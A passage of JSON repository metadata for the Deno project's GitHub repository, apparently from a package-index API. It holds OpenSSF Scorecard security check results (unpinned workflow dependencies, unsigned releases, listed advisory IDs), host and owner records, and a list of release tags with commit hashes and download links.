https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"